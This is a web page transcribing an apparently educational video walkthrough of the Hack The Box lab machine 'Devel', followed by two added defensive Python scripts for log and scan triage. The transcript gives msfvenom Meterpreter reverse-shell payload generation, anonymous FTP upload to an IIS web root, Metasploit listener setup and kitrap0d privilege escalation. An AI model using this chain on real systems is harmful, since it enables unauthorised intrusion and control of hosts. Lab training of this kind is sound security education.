Pentesting for n00bs: Episode 4 - Devel

The Cyber Mentor · Beginner · 🔐 Cybersecurity · 6y ago

Key Takeaways

The video demonstrates pentesting techniques using tools like nmap, dirbuster, and msfvenom, focusing on scanning, enumerating, and exploiting vulnerabilities on a target machine called Devel.

Full Transcript

Hey-o, it's episode four. What's up, my n00bs? We are going to be working on a machine today called Devel, D-E-V-E-L, not devil. Now this is a nice machine to take a step up. We've been mostly learning about SMB exploitation; today we're gonna be learning a little bit more about shellcode generation and how we can do a little bit of enumeration. And let's just... let's not talk about it yet, let's do our first thing first, kind of deal. Let's go ahead and spin up that machine, right, and let's go ahead and start our nmap scan. So I'm going to open a new window here and we're gonna do an nmap -T4 -A -p-, and again, for the second video in a row, I've already forgotten what the IP address is. It's .5, we're gonna scan .5, and we will let that scan.

So, in my common stalling tactic, let's talk about the machine a little bit more in detail. What we're gonna be seeing today is a machine that is very common, at least at the beginner levels of Hack The Box. Now the exploitation type isn't really as common, but what you're gonna see is a very common port combination, something along the lines of port 21 and port 80. You see that a lot, where you have a website and you have port 21, or you might have port 22 and port 80, and you have to leverage an exploit somewhere in order to get somewhere else, and you're gonna see that here in a minute. Now if you remember back to episode 2, we talked about FTP. Remember we had FTP in our machine? It was Lame, right, we did Lame and we had FTP, and I talked about the staging process, about needing a place to execute an exploit, and you're gonna see that come into play today: how can we leverage FTP if we have anonymous access, and how can we enumerate what is in front of us? So we're gonna go ahead and just let the scan finish really quick, and then once the scan finishes we're gonna be looking at it and we'll talk further into detail.

Okay, the scan has returned, so let's take a look here. And as I kind of discussed, we have port 21 and we have port 80 here. Now there is a little bit of information that is being disclosed to us here: you can see that we have Microsoft IIS 7.5. Why do we know that? Well, because they're putting it in their headers. Now on a vulnerability assessment or a pen test this is a no-no. This is an information disclosure; it's a low finding, it's very low, but all this is here is information disclosure, right? It's information gathering for us; we want to avoid this if we can. Same thing with the site title, "IIS7". Now that's beginning to tell me, just from experience, that we're probably looking at a default web page, if the title is going to be "IIS7". On the other front here we see that there is FTP open with anonymous login, and we can see there are some files in here that, to my experienced eye, look as if they are an IIS directory, right, a web root directory. So what we're looking at is an anonymous login, which again is probably a no-no, right? Why are we allowing people to log in anonymously unless there's a very, very good reason for this? This is probably a ding on an assessment as well. If we scroll down through the rest, it's gonna take some guesses at the operating system. It's not a phone, so again this doesn't really come through that great. I got some traceroute out, nothing fancy, so we're gonna focus here.

So what it looks like here is we have a website and we've got FTP. So, my enumeration for a website: first things first, the first thing I like to go do is I like to go out to the website, and we'll just go to 10.10.10.5, and you see that it is in fact a default web page. If we were to click on this it would go to Microsoft's website. Now you see this a lot during pen testing, okay? When we're doing pen testing we come across these default web pages a lot. Now this signifies one of two things. One, they have a website out in the open and they have it running on the back end somewhere at a different directory, right? There's probably a directory to a web page that's running, and it may resolve to a domain name. Let's just say Google: it may be like dev.google.com is where they're running on this web server, but when you just navigate to port 80 or 443, the default web page is still here. This is a finding on a pen test as well; this signifies that there is poor hygiene, right, if we're seeing this. And the other thing I should mention too, the other part of this, is okay, potentially you're not even running a website; they just have IIS on for whatever reason. Again, same thing, poor hygiene. As an attacker, if I'm seeing default web pages, that makes me think, okay, what other things have you forgotten to turn off? Are you a lazy person, a lazy engineer on the other side that I'm up against? Why am I seeing these kinds of things? So because of this, it makes me really inquisitive, right, and when I see default web pages I think, okay, there's probably a reason that it's up there, and if there is, then there's probably a hidden directory somewhere.

So my first thought in this instance is I'm going to look for extra directories, and my favorite tool for that is called DirBuster. Now let's go ahead and open up a new tab. Now DirBuster stands for, or is short for, directory busting, and what we're doing is we're going to brute-force directories here. So we'll say directory one, directory two, directory three, right, we'll just try to go through a whole list of directories that we provide and see if any of them come back. Now we may be able to find some hidden information, especially in capture-the-flag type stuff, and in real-world situations where you run into this. So let's go ahead and type in dirbuster. Now I like to do "dirbuster &", like this, to start it as its own process, okay? Another thing that I should note is there are other tools that we can use. DirBuster's my favorite; a lot of people are big on gobuster right now. I haven't jumped on that train; I've used it sometimes and it works very well. The other one that people like is called dirb, d-i-r-b. You can use either of those as well and be successful here.

So what I'm gonna do is I'm just going to copy the web address and paste it in here. It actually didn't, okay, so we'll have to type in http:// and it likes the port 80 at the end, like that, okay. On top of this, I like to use more threads, because we get to go faster when we do that. So on top of that we need a word list. Here's our word list area. Now Kali is very nice: if you go to the base here there is a /usr folder, share, and then if you start typing wordlists, what you find there is a wordlists folder. So again, /usr/share/wordlists; inside of that is dirbuster here, and then there's the word list. Now the one I like to use is the medium, but for this instance we're just gonna use small, and in some cases if you've really got a lot of time there is a big word list out on GitHub. If you search for "dirbuster big wordlist", somebody has made one. So let's go ahead and select this word list. Now if we come down to the bottom down here, what we're gonna be looking at: we're gonna brute-force directories, files, we're gonna be recursive, that means when we find one directory we're going to go ahead and go on and try to find more directories inside that directory, so this is great. The one thing that we're gonna do here though is PHP is not what we're searching for now. This is a Windows machine, right, in high probability that we're running against a Windows machine because we're running against Microsoft IIS, and we're gonna be running against asm, asmx file extensions, asp, aspx file extensions, probably with higher probability, right, than we are gonna be PHP. If this were an Apache web server, for example, then we would be using a PHP extension, but in this instance I'm gonna hedge my bet that it's not. So we're gonna go ahead and say something along the lines of asm,asmx,asp,aspx. Now that will search for all four extensions. On top of this, I always like to add in some other stuff when I'm doing this in a real-world assessment, like a text file, like a zip file, backup file, RAR file, a SQL database, etc. You can make this list longer; the longer you make this list, the longer it's gonna take, especially if it starts finding directories. Now let's go ahead and hit start on this guy. Now I'll be honest, I have actually not run directory busting on this; I am just showing you my methodology when I see a web page, and especially when I see something like this.

Now my trained eye would actually go right here to FTP, okay? So FTP: I am seeing aspnet_client, I'm seeing iisstart.htm, and I'm seeing welcome.png. We do a view page source, we come into here, and we see, what, welcome.png, right? So we could probably replace this file with a picture of something else if we wanted to. We can just go out to the web, and we can go to Google, and let's just say something like "cute dog", right? We'll take the cute dog, let's go find an image of one, and let's say I want a JPEG. So okay, this one's a JPEG. I'm just gonna go ahead and save that image out to my desktop and we'll call it dog.jpg. Oops, okay, dog.jpg, all right. And this is just a proof of concept here that we are indeed in a web folder. So let's go ahead and do this, blow it up. I'm gonna change to my desktop since that's where I put the file, and then ftp over to this web, or this machine I should say. Now it's gonna ask for a name, and we saw that anonymous login works, so we're just gonna do anonymous, anonymous, okay? And then we have commands. I could say help, and you've got a lot of commands, very similar to Linux. You could say ls, pwd, okay, you can see what directories you have access to. Now we could enumerate this; we could go into this aspnet_client and see if there's any files in here, dig deeper, get information out of it. Just to save time I'm not gonna do that, but just know that that's perfectly okay in terms of enumeration. So here let's go ahead and just do a put. This just means we're gonna put something onto the server. I'm gonna put dog.jpg onto the server. ls, looks like it's there, nice. Okay, so now if we come here and we say /dog.jpg... I don't know what happened to my wonderful picture, but my wonderful picture is somewhat there, so we know that it worked, right? We could put a text file there, whatever, okay.

Why is this important? Well, this is important because we talked about this two episodes ago. I can put things into this folder, but unless I have a second chain where I can have somebody execute them, or I can execute them myself, then FTP really isn't that vulnerable to me. But what did we just do? We just came in here and we executed this file, right? We accessed this file, the server read this file, and we've executed it. So what's stopping us then from putting malware onto this and doing the same thing? And that's really what I'm after: I want to put some malware onto this machine and I want to exploit it, right? So we're gonna do that right now.

So what we can do is we can use a tool called msfvenom. In the last episode we very, very briefly talked about msfvenom, and one thing that you can do is, if you ever need a cheat sheet, you can just go out to Google and you could say "msfvenom", and you know, you can see "cheat sheet" right here. You can do something like aspx and just find something particular. Like, this is one that I've been to in the past; you could look at these cheat sheets here, there's a HighOn.Coffee cheat sheet as well. There's a bunch in here that'll tell you like, hey, if you're doing it against a Windows machine, or hey, here's ASP right here, and this is really what we're after, right, because we know that they run ASP, ASPX, as an IIS server, so this is the type of file we're gonna need. Now if this were an Apache server, okay, maybe we need an Apache payload, right, or if it's JSP, or if we're using Tomcat, then we're gonna do a WAR file, and we have a bunch of different cheat sheet payloads here. This is perfect.

So what we're gonna do is we're going to generate a payload. So all we're doing is generating malware; we are generating something that is going to say, hey, I'm listening on this connection, use this payload here, right? And this payload is going to be a Meterpreter payload. Remember that I told you in the last episode that if I have the opportunity I will use the Meterpreter payload. We also could just use a generic Windows exploit payload here, but what we're going to do is we're going to use this payload and we're going to exploit it, okay? So this payload's gonna say, hey, use this payload, contact back to me, reverse shell, right, contact back to me at my listening host, at my listening port, and then let's set a file type in the shell. So let's go ahead and type this out and then we'll talk about it in more detail. So we're gonna do msfvenom, and we're gonna do a -p for payload, and this payload should look familiar to you, right: windows/meterpreter, and then we're gonna say reverse_tcp, okay? Now we don't know if this host is going to be 32-bit or 64-bit, so let's start with 32-bit; if we need to improve the payload we can, all right? So let's do this: we'll say LHOST, and then we need our IP address, 10.10.14.24. We need a listening port; we're just going to use 4444 for now. And then we are going to say a file type, so I'm going to say -f aspx. You could also do asp, that'll be fine, but aspx. And then what we're going to do is we're going to put this all into a file, okay; we could just call this ex.aspx. Now if we didn't add this into a file here, then this would print out shellcode for us, and we're not at that level right now. We're not printing out, copying and putting it into things; we need this to be in its own aspx file, so when we execute it, it runs the command that it needs to, and it knows that, based on the file type and the server we're putting it on, it's appropriate for this aspx file type, okay? So we're gonna hit enter. Now it's gonna take a second to generate, and it's gonna put it on the desktop, which is where we had it.

And then once it generates, we need to do one other thing. We need to now open up one more new tab, and then I'm going to go into Metasploit, msfconsole. Follow along with this, and we're gonna run that exploit handler. Now you saw all this in the last episode; you just saw it done for us. Now we're gonna do this ourselves, okay? So let's say use exploit/multi/handler. Now we really haven't gotten into netcat yet, but when we do, this is very similar to netcat: we are just listening, right? All we're doing is saying, open up a listener, and on this port talk back to me at this IP address, and we're just gonna be listening on that port. So let's go ahead and just say options. You're gonna see that there's literally nothing in here, so what we're gonna have to do is we're gonna have to set a payload, so the payload has to be identical to what we just generated. So that's going to be set payload windows/, and you should be able to auto-tab, it's just a little slow, meterpreter/, and then we've got reverse_tcp. Options again, okay. Now let's set the LHOST to your IP address, your listening host. The port has to match as well; 4444 is default, that's perfect, that's what we chose. Let's go ahead and run this, and now we're just gonna let this sit here, and it's gonna run and listen, okay?

So coming back to here, I bet we've lost our connection. Let's see if we have. We have, okay, let's say bye and connect again, anonymous, anonymous. Now let's go ahead and put that ex.aspx file on here. We did it, perfect. Another thing that I should note too is we are likely transferring via ASCII right now. Preferably we should transfer via binary, so you would type binary and then transfer your file. I think it's okay, but if you ever run into issues with FTP and you're transferring a file or a payload and it's not working, try switching to binary and then transferring the file again and seeing if that fixes anything. I've had that happen in the past; it's better to use binary over ASCII, okay.

So we know how to call out, right? We've got a listener going, we've got our malware uploaded, and so we're waiting here for a connection. Now we need to engage that malware and make the server execute it, so ex.aspx here, hit enter. Okay, it engaged, and look, we just got a session. That easy, okay. So we say sysinfo: x86 Meterpreter. We won the lottery there; we got the right system on everything, okay, x86 Meterpreter, architecture x86, Windows 7 build. And then we say getuid. Crap, we are not NT AUTHORITY\SYSTEM, darn it. So we can't do things like hashdump right now, right? We're not SYSTEM. Now there is a tool that we can try to use called getsystem. Hit enter. Didn't work, that's okay. Sometimes you get a win from this, but do note that on a rare occasion that actually can crash a machine if you're doing a pen test, so be very careful. But one of the favorite things that I want to show you, and I talked about it last time, is there are post modules in Meterpreter. What our session is, we can actually background the session, and then we can say, let's search for this. We'll say search suggester, like this, and there's only one, but look, this is a post module here. So let's copy this and we're gonna say use, paste this, hit enter, and then let's look at our options now, and look what it's gonna ask for. It's gonna say, hey, all I need is this session, because you already have a session, so just give me that and I'll access that session and we'll do a little bit of enumeration. So this is post-exploitation enumeration, okay? So we're gonna say set session 1, then we're gonna run this, and what this is gonna do is this is gonna look through all the x86 exploits that it knows of that are privilege escalation exploits. It's gonna compare what's going on in the Windows system and say, hey, yeah, that might be good for this, or no, that's not gonna work, and then it's gonna return a list of those that will possibly work for us, okay? And this will only take a minute, and then what happens is we're gonna go through this list and we're gonna say, okay, I'm gonna try the first one, or the second one, or the third one, and we're just gonna keep going until we know, you know, if it's vulnerable.

Look, I mean, they're coming through. So best scenario for us here is we've got one, two, three, four, five. We could go through this whole list if we're desperate. The one that I like to use, we could use this bypassuac_eventvwr; let's just go straight for the win here. I believe kitrap0d's gonna work; kitrap0d's pretty friendly. So let's go ahead and say use, paste. Now I'm gonna show you something. Let's type in options, okay, let's set the session to 1, and look, it already has our target as Windows 7, that's fine, x86, perfect, so our session is good. And let's type in options again, okay, look at the screen, remember the screen, see what happens. Now let's hit run. This is not going to work, okay. We launched a process; we did not get a reverse shell back. Let's type in options again. Look what changed: now payload options are in here. Why didn't this work? Well, for me it always tends to default back to my Ethernet interface; I don't know why it does this. So you could, without seeing the screen, if you keep it in the back of your mind, you could just say, hey, I know that I need my LHOST to be 10.10.14.24, and you know what, I know I'm already on an LPORT of 4444, so I'm already listening, or I've already used that port up; let's do something different. Let's set the LPORT to 4445, it's fine, right? Let's look at our options now, okay, and now let's try running this, and let's see if we can get this to work. And it might take a second from the first exploitation, it might take a second here. Okay, and what has happened? I've lost my session. So let's go ahead, and I'm gonna Ctrl-C here. What we need to do is we need to set up another listener, and we probably just tab up a little bit. There we go, and then say options here, okay. So I'm gonna run this again; we just need to execute that payload. Sometimes your listener dies; hopefully you're a little bit more fortunate than me and yours didn't. You can see now that we've generated again, we've got the shell. We'll be quick about this, so go back around, you tab up a few times, we've got the kitrap0d in there already. Set the session to 2 instead of 1, because our new session is session 2, and then we'll set options, and now let's go ahead and run it. And it's possible that we killed our session with the failed attempt there. What I actually believe happens is that it tries to connect and then you potentially lose your session because it closes out the other one to exploit into the new one. So let's try this one here, okay, and now we ran the session and we're okay. So if you lost your session like me, showing you proof of concept, know in the back of your mind that, hey, I probably want to set an LPORT on these privesc attempts, or an LHOST as well, in these privesc attempts. And then let's go ahead and say getuid, and you can now see that we're NT AUTHORITY\SYSTEM. So same thing as before: we can do a hashdump, look at the hashes, we can go grab the root, the user, whatever the flags are on those. Not going to show you to do that. We can load modules; you've seen that over and over, right? This is kind of becoming repetition, so this is a great way of doing this.

My challenge to you is: look into payloads, okay? I don't know what the command is; I believe it's msfvenom -l, might not be -l. There is a payload option in here that lists out all the payloads. [Music] Okay, let's do msfvenom -l payloads then, and it'll list all the payloads. My suggestion is to go back into this machine, and instead of running Meterpreter, try running a Windows reverse TCP payload or something along those lines. See all these windows/meterpreter? Let's skip those; just run a Windows reverse TCP shell, shell/reverse_tcp, which is right here. Try doing that as your payload, okay, and with that as your payload you don't have to use Meterpreter. So what you can do is, instead, you can just say, hey, I'm not gonna use the exploit handler, I'm gonna say netcat, nc -nvlp, I'm gonna listen on port 4444 here, and then just wait for a session to come across, and that's it, okay? So my challenge to you is to redo this exploit using it manually as opposed to using Metasploit and Meterpreter, and see what your results are. So a little bit of homework, but that is it for this episode.

So we took our scan, we looked at some things, and we could check real quick on the DirBuster. Like I said, I've never run it before, and it hasn't found anything, and that's fine; it finished the requests. So, you know, it's always good to do directory busting. It's also good to run nikto if this were actually a website; we'll get to nikto at some point, but if this were a website, good to run nikto as well, directory busting of course, inspect the website. But here it was really apparent, to a trained eye, that FTP was the way to go, because we had execution here. We did a proof of concept with the dog JPEG, and then we were able to generate a payload with msfvenom and then execute it here and get a shell, and then we also went in and we were able to use the exploit suggester and use that to get another shell. This may be a lot of information, right; this is some new tricks that I'm throwing at you. Please rewatch the video, please try it on your own as well, take everything and try the manual way, and then try it again this way as well. See if you can repeat all the steps without watching the video, just using your notes. It's always good to have a good notebook, so if you're not doing that already, go ahead and start doing that now. But that is it for this lesson. I am TCM; until the next one, I really do thank you for joining me. [Music]
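The weakness this episode turns on is anonymous FTP write access into the IIS web root followed by an HTTP request that makes the server run the uploaded .aspx. The check below is an added, defender-side example, not code from the video or from TCM: it parses IIS W3C FTP and HTTP logs (field layouts are assumed and written in each constructed #Fields line; the parser reads whichever names the log carries), flags anonymous STOR uploads of script-handled extensions, and escalates those that are later requested over HTTP. The log lines are constructed, using the lab addresses from the episode, and the FTP root is assumed to be the web root, as on Devel.

```python
import os
from datetime import datetime

# Extensions IIS hands to a script engine (assumed list; the episode names asp/aspx/asmx).
# An anonymous upload of one of these into the web root is a web shell waiting for a GET.
EXEC_EXTS = {".asp", ".aspx", ".asmx", ".ashx", ".asa"}
# Usernames treated as anonymous/unauthenticated in the FTP log (assumption).
ANON_USERS = {"anonymous", "ftp", "-"}


def parse_w3c(text):
    """Parse an IIS W3C extended log into dicts keyed by the names in its #Fields line."""
    fields, records = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # field layout comes from the log itself
            continue
        if line.startswith("#"):
            continue                            # other directives (#Software, #Date, ...)
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue                            # skip malformed lines instead of crashing
        records.append(dict(zip(fields, values)))
    return records


def _when(rec):
    return datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")


def anonymous_executable_uploads(ftp_records):
    """Successful STOR commands from an anonymous session whose target has a script extension."""
    hits = []
    for r in ftp_records:
        if r.get("cs-method") != "STOR" or not r.get("sc-status", "").startswith("2"):
            continue
        if r.get("cs-username", "-").lower() not in ANON_USERS:
            continue
        # x-fullpath is the virtual path of the stored file; fall back to the command argument
        path = r.get("x-fullpath") or r.get("cs-uri-stem", "")
        if not path.startswith("/"):
            path = "/" + path
        if os.path.splitext(path.lower())[1] in EXEC_EXTS:
            hits.append({"path": path, "uploader": r.get("c-ip"), "uploaded_at": _when(r)})
    return hits


def correlate(ftp_log, http_log):
    """Alert on each anonymous script upload; severity 'executed' if the same path is then served over HTTP."""
    http = parse_w3c(http_log)
    alerts = []
    for hit in anonymous_executable_uploads(parse_w3c(ftp_log)):
        alert = dict(hit, severity="uploaded", executed_at=None, executed_by=None)
        for h in http:
            same_path = h.get("cs-uri-stem", "").lower() == hit["path"].lower()
            served = h.get("sc-status", "").startswith("2")
            if same_path and served and _when(h) >= hit["uploaded_at"]:
                alert.update(severity="executed", executed_at=_when(h), executed_by=h.get("c-ip"))
                break
        alerts.append(alert)
    return sorted(alerts, key=lambda a: a["uploaded_at"])


# Constructed sample logs (not real captures); 10.10.14.24 / 10.10.10.5 are the episode's lab addresses.
FTP_LOG = """
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2019-03-10 14:02:11 10.10.14.24 anonymous 10.10.10.5 21 USER anonymous 331 0 0 1a2b3c /
2019-03-10 14:02:11 10.10.14.24 anonymous 10.10.10.5 21 PASS *** 230 0 0 1a2b3c /
2019-03-10 14:03:40 10.10.14.24 anonymous 10.10.10.5 21 STOR dog.jpg 226 0 0 1a2b3c /dog.jpg
2019-03-10 14:09:05 10.10.14.24 anonymous 10.10.10.5 21 STOR ex.aspx 226 0 0 1a2b3c /ex.aspx
2019-03-10 14:12:00 10.10.14.24 anonymous 10.10.10.5 21 STOR shell.asp 226 0 0 1a2b3c /shell.asp
2019-03-10 14:12:30 10.10.14.24 anonymous 10.10.10.5 21 LIST - 226 0 0 1a2b3c /
"""

HTTP_LOG = """
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-03-10 14:04:02 10.10.10.5 GET /dog.jpg - 80 - 10.10.14.24 Mozilla/5.0 200 0 0 15
2019-03-10 14:09:30 10.10.10.5 GET /ex.aspx - 80 - 10.10.14.24 Mozilla/5.0 200 0 0 812
"""

if __name__ == "__main__":
    for a in correlate(FTP_LOG, HTTP_LOG):
        print(f"[{a['severity'].upper()}] {a['path']} uploaded by {a['uploader']} at {a['uploaded_at']}"
              + (f", requested by {a['executed_by']} at {a['executed_at']}" if a["executed_at"] else ""))
```

The image upload (dog.jpg) is deliberately not flagged: only script-handled extensions matter, and the HTTP hit on /ex.aspx is what separates a staged web shell from one that has already run.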

Original Description

Get my:
25 hour Practical Ethical Hacking Course: https://www.udemy.com/course/practical-ethical-hacking/?referralCode=4A7D5EE973AFBCAD11C6
Windows Privilege Escalation for Beginners Course: https://www.udemy.com/course/windows-privilege-escalation-for-beginners/?referralCode=7CADEAA4AA3D5A1032AE

0:00 - Spinning up Devel
0:45 - Scanning with nmap / overview of machine
2:30 - Reviewing our nmap scan
4:24 - Enumerating port 80
6:15 - Using dirbuster for finding hidden directories
10:18 - Enumerating FTP
13:50 - Generating a payload with msfvenom
17:25 - Generating a listener
18:51 - Executing the payload via FTP upload/HTTP
20:30 - Privilege escalation with post modules

❓Info❓
Need a Pentest?: https://tcm-sec.com
Learn to Hack: https://academy.tcm-sec.com

🔹The Cyber Mentor Merch🔹
https://teespring.com/stores/the-cyber-mentor

📱Social Media📱
Website: https://thecybermentor.com
Twitter: https://twitter.com/thecybermentor
Twitch: https://www.twitch.tv/thecybermentor
Discord: https://tcm-sec.com/discord
LinkedIn: https://www.linkedin.com/in/heathadams

💸Donate💸
Like the channel? Please consider supporting me on Patreon: https://www.patreon.com/thecybermentor
Support the stream (one-time): https://streamlabs.com/thecybermentor

Hacker Books:
Penetration Testing: A Hands-On Introduction to Hacking: https://amzn.to/31GN7iX
The Hacker Playbook 3: https://amzn.to/34XkIY2
Hacking: The Art of Exploitation: https://amzn.to/2VchDyL
The Web Application Hacker's Handbook: https://amzn.to/30Fj21S
Real-World Bug Hunting: A Field Guide to Web Hacking: https://amzn.to/2V9srOe
Social Engineering: The Science of Human Hacking: https://amzn.to/31HAmVx
Linux Basics for Hackers: https://amzn.to/34WvcXP
Python Crash Course, 2nd Edition: https://amzn.to/30gINu0
Violent Python: https://amzn.to/2QoGoJn
Black Hat

The Cyber Mentor
55 How NOT to Approach a Cybersecurity Mentor
How NOT to Approach a Cybersecurity Mentor
The Cyber Mentor
56 Web App Testing: Episode 4 - XXE, Input Validation, Broken Access Control, and More XSS
Web App Testing: Episode 4 - XXE, Input Validation, Broken Access Control, and More XSS
The Cyber Mentor
57 Pentesting for n00bs: Episode 7 - Optimum (hackthebox)
Pentesting for n00bs: Episode 7 - Optimum (hackthebox)
The Cyber Mentor
58 Pentesting for n00bs: Episode 8 - Bashed (hackthebox)
Pentesting for n00bs: Episode 8 - Bashed (hackthebox)
The Cyber Mentor
59 Pentesting for n00bs: Episode 9 - Grandpa
Pentesting for n00bs: Episode 9 - Grandpa
The Cyber Mentor
60 Top 5 Internal Pentesting Methods
Top 5 Internal Pentesting Methods
The Cyber Mentor

This video walks through the Hack The Box machine Devel end to end: scanning it with nmap, enumerating the web server and the FTP service, generating a payload with msfvenom, staging that payload through anonymous FTP so it can be triggered over HTTP, and escalating privileges with post-exploitation modules. The lesson is hands-on and follows the same scan, enumerate, exploit sequence as the earlier episodes, adding shellcode generation and service-to-service staging to what the SMB-focused episodes covered.

Key Takeaways
  1. Spin up the Devel machine
  2. Scan it with nmap (ports 21 and 80 come back open)
  3. Review the nmap results: FTP or SSH alongside a web server is a common pairing where one service is leveraged to stage an attack on the other
  4. Enumerate port 80, using dirbuster to find hidden directories
  5. Enumerate FTP and check for anonymous access
  6. Generate a payload with msfvenom
  7. Start a listener for the reverse connection
  8. Upload the payload over FTP and trigger it by requesting it over HTTP
  9. Escalate privileges with post modules
💡 The key to this box is enumeration: anonymous FTP write access plus a web server on the same host means anything you upload can be requested, and executed, through the web server. Scan and enumerate thoroughly first; the exploit follows from what you find.
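The review step above (step 3) is where the episode's whole approach is decided: an FTP service that allows anonymous login next to a web server on the same host is the precondition for the upload-over-FTP, trigger-over-HTTP technique used in steps 5 through 8. The script below is an added example, not code from the video or from The Cyber Mentor; it triages nmap XML output for exactly that pattern. It assumes the scan was run as `nmap -sV -sC -oX <file> <target>`, so that nmap's `ftp-anon` NSE script has had a chance to report anonymous logins, and the sample XML embedded in it is constructed (addresses from the 192.0.2.0/24 documentation range, no real scan data).

```python
"""Triage nmap XML output for the FTP-plus-web staging pattern from the Devel walkthrough.

Added example, not code from the video or from The Cyber Mentor. It assumes a scan
run as `nmap -sV -sC -oX <file> <target>` so that the ftp-anon NSE script has had a
chance to report anonymous logins; the sample XML below is constructed, not a real scan.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample: host .5 mirrors the episode's port 21 + port 80 combination with
# anonymous FTP; host .6 has FTP and a web service open but no anonymous login, so it
# must not be flagged. Addresses are from the 192.0.2.0/24 documentation range.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX - 192.0.2.0/24">
  <host>
    <address addr="192.0.2.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" method="probed"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" method="probed"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.0.2.6" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" method="probed"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="open" reason="syn-ack"/>
        <service name="http-proxy" method="probed"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
        <service name="https" method="table"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Service names nmap uses for web servers that could serve an uploaded file.
WEB_SERVICE_NAMES = {"http", "https", "http-alt", "http-proxy"}


@dataclass
class StagingCandidate:
    """A host where an anonymous-FTP upload may be reachable through a web server."""
    host: str
    ftp_ports: list = field(default_factory=list)
    web_ports: list = field(default_factory=list)


def open_ports(host_elem):
    """Yield the <port> elements nmap reported as open (closed/filtered are skipped)."""
    for port in host_elem.iterfind("./ports/port"):
        state = port.find("state")
        if state is not None and state.get("state") == "open":
            yield port


def service_name(port_elem) -> str:
    """Return the nmap service name for a port, or "" if none was recorded."""
    service = port_elem.find("service")
    return service.get("name", "") if service is not None else ""


def anonymous_ftp_allowed(port_elem) -> bool:
    """True only if the ftp-anon NSE script reported a successful anonymous login."""
    for script in port_elem.iterfind("script"):
        if script.get("id") == "ftp-anon" and "Anonymous FTP login allowed" in script.get("output", ""):
            return True
    return False


def find_staging_candidates(xml_text: str) -> list:
    """Return hosts that expose both anonymous FTP and an open web service."""
    root = ET.fromstring(xml_text)
    candidates = []
    for host in root.iterfind("host"):
        address = host.find("address[@addrtype='ipv4']")
        if address is None:
            continue
        cand = StagingCandidate(host=address.get("addr"))
        for port in open_ports(host):
            name = service_name(port)
            portid = int(port.get("portid"))
            if name == "ftp" and anonymous_ftp_allowed(port):
                cand.ftp_ports.append(portid)
            elif name in WEB_SERVICE_NAMES:
                cand.web_ports.append(portid)
        # Only the combination matters: FTP alone or HTTP alone is not a staging path.
        if cand.ftp_ports and cand.web_ports:
            candidates.append(cand)
    return candidates


if __name__ == "__main__":
    for c in find_staging_candidates(SAMPLE_NMAP_XML):
        print(f"{c.host}: anonymous FTP on {c.ftp_ports}, web on {c.web_ports}; "
              "upload a harmless test file over FTP and request it over HTTP to confirm the web root is writable")
```

On a real engagement, feed it the contents of the `-oX` file instead of the embedded sample. A flagged host is a candidate, not a confirmed path: the FTP root and the web root are not always the same directory, so the confirming step is to upload a harmless file over FTP and request it by name over HTTP before generating any payload.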

Chapters (10)

Spinning up Devel
0:45 Scanning with nmap / overview of machine
2:30 Reviewing our nmap scan
4:24 Enumerating port 80
6:15 Using dirbuster for finding hidden directories
10:18 Enumerating FTP
13:50 Generating a payload with msfvenom
17:25 Generating a listener
18:51 Executing the payload via FTP upload/HTTP
20:30 Privilege escalation with post modules